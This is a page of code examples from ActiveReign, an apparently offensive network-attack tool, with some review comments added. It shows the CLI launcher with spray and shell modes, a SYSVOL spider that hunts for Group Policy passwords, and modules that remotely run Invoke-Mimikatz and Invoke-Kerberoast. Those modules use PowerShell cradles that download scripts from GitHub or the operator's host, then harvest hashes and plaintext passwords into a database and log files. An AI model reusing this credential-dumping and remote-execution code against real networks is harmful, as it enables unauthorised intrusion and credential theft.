示例#1
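def main():
    """Parse the command line, prepare logging/config/database, and run the selected mode.

    Flow, as visible in this function:
      1. Build the top-level parser and let each ``*_args`` helper register its
         sub-command on the sub-parser (``dest='mode'``).
      2. Create the console logger, run the first-run and workspace checks and
         load the configuration.
      3. Create the per-mode file logger(s) and the workspace database handle.
      4. Call ``<mode>_arg_mods`` to post-process the arguments, then import
         ``ar3.ops.<mode>`` and call its ``main``.

    Exits with status 1 after printing help when too few arguments were given
    or no mode was selected, and with status 0 on Ctrl-C. Any other exception
    raised while running the mode is printed and not re-raised.
    """
    main_parser = argparse.ArgumentParser(description=banner(), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
    main_parser._optionals.title = 'Optional Arguments\n\033[1;30m>>-------------------->\033[1;m'
    main_parser.add_argument('-D', '--debug', dest="debug", action='store_true', help='Show debug messages & failed login attempts')
    main_parser.add_argument('-T', dest='max_threads', type=int, default=75, help='Max number of threads to use')
    main_parser.add_argument('--host-max', dest='max_host_threads', type=int, default=20, help='Max threads per host')
    main_parser.add_argument('-W', dest='workspace', type=str, default='', required=False, help='Manually set workspace, otherwise defaults to config file')
    sub_parser = main_parser.add_subparsers(title=' \nOperational Modes\n\033[1;30m>>-------------------->\033[1;m', dest='mode')

    db_args(sub_parser)
    enum_args(sub_parser)
    shell_args(sub_parser)
    spray_args(sub_parser)
    query_args(sub_parser)
    args = main_parser.parse_args()
    # A command line with options but no sub-command leaves args.mode as None;
    # stop here instead of building a logger and a handler name from None.
    if len(argv) <= 2 or args.mode is None:
        main_parser.print_help()
        # SystemExit directly: does not depend on the site-provided exit() helper.
        raise SystemExit(1)

    log_level = logging.DEBUG if args.debug else logging.INFO

    # Init console logger
    loggers = {'console': setup_logger(log_level, 'ar3')}

    # First checks & load config
    first_run_check(loggers['console'])
    config_obj = ConfigLoader()
    if not args.workspace:
        args.workspace = config_obj.WORKSPACE
    first_workspace_check(args.workspace, loggers['console'])

    # Setup file logger
    loggers[args.mode] = setup_file_logger(args.workspace, args.mode)
    # Setup secondary loggers - use argv since arg_mods haven't been made yet
    if '--spider' in argv:
        loggers['spider'] = setup_file_logger(args.workspace, "spider")
    if '--gen-relay-list' in argv:
        loggers['relay_list'] = setup_file_logger(args.workspace, "relay_list")

    # Setup DB
    db_obj = Ar3db(args.workspace, loggers['console'], args.debug)

    try:
        # Resolve "<mode>_arg_mods" with a plain name lookup rather than eval():
        # the mode string can then only select an existing module-level callable
        # and is never interpreted as an expression.
        arg_mods = globals().get("{}_arg_mods".format(args.mode))
        if not callable(arg_mods):
            raise RuntimeError("No argument handler for mode '{}'".format(args.mode))
        args = arg_mods(args, db_obj, loggers)
        if args.debug:
            print_args(args, loggers['console'])

        # The module path is built from the mode name; the sub-parser restricts
        # that name to the registered sub-commands.
        ops = import_module("ar3.ops.{}".format(args.mode))
        ops.main(args, config_obj, db_obj, loggers)

    except KeyboardInterrupt:
        print("\n[!] Key Event Detected, Closing...")
        raise SystemExit(0)
    except Exception as e:
        # NOTE(review): the process still ends with status 0 after this message,
        # so a wrapper script cannot tell a failed run from a clean one.
        print("[!] ActiveReign Error: {}".format(str(e)))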
示例#2
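    def run(self, target, args, smb_con, loggers, config_obj):
        """Spider the SYSVOL share for XML files matching the ``gpp_password`` pattern.

        Args:
            target: Host to search; replaced by the module's ``DC`` option when
                that option has a value.
            args: Parsed CLI namespace. ``max_depth`` and ``spider`` are
                overwritten on it before the spider runs.
            smb_con: Connection object; ``host``, ``ip`` and ``db`` are read.
            loggers: Dict of loggers; a ``'spider'`` file logger is added to it.
            config_obj: Base configuration. It is copied and only the copy is
                specialised for this search.
        """
        import copy

        # Define Target
        self.count = 0
        dc_override = self.args['DC']['Value']
        if dc_override:
            target = dc_override

        # Create custom spider config on a shallow copy: assigning these
        # attributes on config_obj itself would change the configuration for
        # every other user of the same object.
        temp_config = copy.copy(config_obj)
        temp_config.WHITELIST_EXT = ['xml']
        temp_config.KEY_EXT = []
        temp_config.KEY_WORDS = []
        # NOTE(review): "******" looks like a masked value on this page; as
        # written it would not compile if it is passed to `re` - confirm the
        # real pattern against the project source.
        temp_config.REGEX = {"gpp_password": "******"}

        # Override args
        # NOTE(review): `args` is modified in place, so the caller sees these
        # values afterwards - confirm that is intended.
        args.max_depth = 12
        args.spider = False

        # Create spider logger
        loggers['spider'] = setup_file_logger(args.workspace, "spider")

        # Start
        console = loggers['console']
        console.info([
            smb_con.host, smb_con.ip, "GPP_PASSWORD",
            "Searching \\\\{}\\SYSVOL\\".format(target)
        ])
        spider(args, temp_config, loggers, smb_con.db, target, 'SYSVOL')
        loggers['console'].info(
            [smb_con.host, smb_con.ip,
             self.name.upper(), "Module complete"])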
示例#3
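    def run(self, target, args, smb_con, loggers, config_obj):
        """Run Invoke-Mimikatz on ``target`` and store the credentials parsed from its output.

        The script is loaded either from the local host over HTTP
        (``args.fileless``) or from the EmpireProject GitHub URL, wrapped by
        ``powershell.gen_ps_iex_cradle`` and run through ``code_execution``.
        Each ``hash`` / ``plaintext`` entry yielded by ``self.parse_mimikatz``
        is written to ``smb_con.db`` and echoed to the console, and the raw
        output is written to a file logger in the workspace.

        Args:
            target: Host passed to ``code_execution`` and used in the output
                file name.
            args: Parsed CLI namespace; ``timeout`` is raised on it in place.
            smb_con: Connection object; ``host``, ``ip``, ``os`` and ``db`` are read.
            loggers: Dict of loggers; only ``'console'`` is used here.
            config_obj: Passed through to ``code_execution``.

        Returns:
            None. Failures are reported through the console logger, not raised.
        """
        logger = loggers['console']
        timeout = args.timeout
        logger.info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
        try:
            # Define Script Source
            # NOTE(review): args.timeout is raised on the shared namespace and
            # never restored in this method, so the value grows with each call
            # that reuses the same `args` - confirm against the caller.
            if args.fileless:
                # NOTE(review): plain http, so the script travels unprotected
                # between the operator host and the target.
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 60)
            else:
                # NOTE(review): fetched from the `master` branch with no pinned
                # revision or integrity check, so the code that runs can change
                # without this file changing.
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
                setattr(args, 'timeout', timeout + 25)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            # NOTE(review): the COMMAND option is placed inside a double-quoted
            # PowerShell string without escaping; a value containing `"` breaks
            # out of the quoting.
            cmd = 'Invoke-Mimikatz -Command "{}"'.format(self.args['COMMAND']['Value'])
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, logger, force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
                results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

                # Display Output
                if not results:
                    logger.fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
                    return
                if args.debug:
                    for line in results.splitlines():
                        logger.debug([smb_con.host, smb_con.ip, self.name.upper(), line])

                # Parse results and send creds to db. Entries whose first field
                # is neither "hash" nor "plaintext" are skipped.
                db_updates = 0
                for cred in self.parse_mimikatz(results):
                    kind = cred[0]
                    if kind == "hash":
                        smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                    elif kind == "plaintext":
                        smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                    else:
                        continue
                    # The recovered secret is written to the console logger in clear text.
                    logger.success([smb_con.host, smb_con.ip, self.name.upper(), "{}\\{}:{}".format(cred[1], cred[2], cred[3])])
                    db_updates += 1
                logger.info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])

                # write results to file
                # The file holds the unfiltered tool output, secrets included, so
                # the workspace directory needs the same protection as the secrets.
                file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
                tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
                tmp_logger.info(results)
                logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])

            except IndexError:
                # Matched by exception type rather than by comparing the message
                # text, which differs between list, tuple and string indexing.
                logger.fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
            except Exception as e:
                logger.fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])

        except Exception as e:
            # Setup errors are only visible when debug logging is enabled.
            logger.debug("{} Error: {}".format(self.name, str(e)))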
示例#4
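    def run(self, target, args, smb_con, loggers, config_obj):
        """Run Invoke-Kerberoast on ``target``, print its output and save it to the workspace.

        The script is loaded either from the local host over HTTP
        (``args.fileless``) or from the EmpireProject GitHub URL, wrapped by
        ``powershell.gen_ps_iex_cradle`` and run through ``code_execution``.
        Every output line is logged at success level and the whole output is
        written to a file logger in the workspace.

        Args:
            target: Host passed to ``code_execution`` and used in the output
                file name.
            args: Parsed CLI namespace; ``timeout`` is raised on it in place.
            smb_con: Connection object; ``host``, ``ip`` and ``os`` are read.
            loggers: Dict of loggers; only ``'console'`` is used here.
            config_obj: Passed through to ``code_execution``.

        Returns:
            None. Errors are logged at debug level, not raised.
        """
        logger = loggers['console']
        timeout = args.timeout
        logger.info([
            smb_con.host, smb_con.ip,
            self.name.upper(), 'Attempting Invoke-Kerberoast'
        ])
        try:
            # Define Script Source
            # NOTE(review): args.timeout is raised on the shared namespace and
            # never restored in this method, so the value grows with each call
            # that reuses the same `args` - confirm against the caller.
            if args.fileless:
                # NOTE(review): plain http, so the script travels unprotected
                # between the operator host and the target.
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(
                    srv_addr)
                setattr(args, 'timeout', timeout + 30)
            else:
                # NOTE(review): fetched from the `master` branch with no pinned
                # revision or integrity check, so the code that runs can change
                # without this file changing.
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
                setattr(args, 'timeout', timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            launcher = powershell.gen_ps_iex_cradle(script_location, '')

            # Execute
            cmd = powershell.create_ps_command(launcher,
                                               logger,
                                               force_ps32=args.force_ps32,
                                               no_obfs=args.no_obfs,
                                               server_os=smb_con.os)
            results = code_execution(smb_con,
                                     args,
                                     target,
                                     loggers,
                                     config_obj,
                                     cmd,
                                     return_data=True)

            # An empty result is reported explicitly instead of surfacing as a
            # debug-only error or as an empty output file.
            if not results:
                logger.fail([
                    smb_con.host, smb_con.ip,
                    self.name.upper(), 'No output returned'
                ])
                return

            # Display Output
            for line in results.splitlines():
                logger.success(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), line])

            # write results to file
            # The file holds the unfiltered tool output, so the workspace
            # directory needs the same protection as that output.
            file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
            tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
            tmp_logger.info(results)
            logger.info([
                smb_con.host, smb_con.ip,
                self.name.upper(), "Output saved to: {}".format(file_name)
            ])
        except Exception as e:
            # Errors are only visible when debug logging is enabled.
            logger.debug("{} Error: {}".format(self.name, str(e)))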